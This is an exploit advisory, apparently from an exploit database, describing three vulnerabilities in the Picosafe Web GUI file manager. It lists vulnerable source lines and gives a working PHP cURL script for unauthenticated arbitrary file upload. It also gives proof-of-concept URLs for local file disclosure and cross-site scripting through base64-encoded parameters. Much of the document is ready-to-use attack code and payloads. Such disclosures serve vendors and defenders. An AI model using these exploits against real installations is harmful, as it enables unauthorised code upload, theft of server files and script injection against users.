65 lines
No EOL
1.6 KiB
Text
65 lines
No EOL
1.6 KiB
Text
[-] Title : Picosafe Web Gui - Multiple Vulnerabilities
|
|
[-] Author : Shahab Shamsi
|
|
[-] Vendor : https://github.com/embeddedprojects/picosafe_webgui
|
|
[-] Category : Webapps
|
|
[-] Date : 01.October.2016
|
|
|
|
|
|
|
|
Vulnerable page :
|
|
picosafe_webgui/webinterface/js/filemanager/filemanager.php
|
|
|
|
|
|
|
|
|
|
==========================
|
|
| Remote File Upload :
|
|
==========================
|
|
Vulnerable Source (RFU) :
|
|
52: chmod($to, 0755);
|
|
48: $to = realpath($curdir) . '/' . $name;
|
|
40: function uploadfile($curdir)
|
|
46: $name = $_FILES['files']['name'][0];
|
|
|
|
Exploit :
|
|
<?php
|
|
$uploadfile="YourFileName";
|
|
$ch = curl_init("http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php");
|
|
curl_setopt($ch, CURLOPT_POST, true);
|
|
curl_setopt($ch, CURLOPT_POSTFIELDS,
|
|
array('file'=>"@$uploadfile"));
|
|
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
|
|
$result = curl_exec($ch);
|
|
curl_close($ch);
|
|
print "$result";
|
|
?>
|
|
|
|
Location :
|
|
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/FileName
|
|
|
|
|
|
==========================
|
|
| Local File Disclosure :
|
|
==========================
|
|
|
|
Vulnerable Source (LFD) :
|
|
17: $file = base64_decode($_GET['file']);
|
|
18: DownloadFile($file);
|
|
111: readfile($file);
|
|
|
|
POC :
|
|
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?file=base64code-Filename
|
|
|
|
|
|
==========================
|
|
| Cross-Site Scripting :
|
|
==========================
|
|
|
|
Vulnerable Source (XSS) :
|
|
8: echo json_encode($data);
|
|
7: $data = sortfiles($data);
|
|
6: $data = listdirectory($directory);
|
|
5: $directory = base64_decode($_GET['directory']);
|
|
|
|
POC :
|
|
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?directory=Base64-ScriptingCode |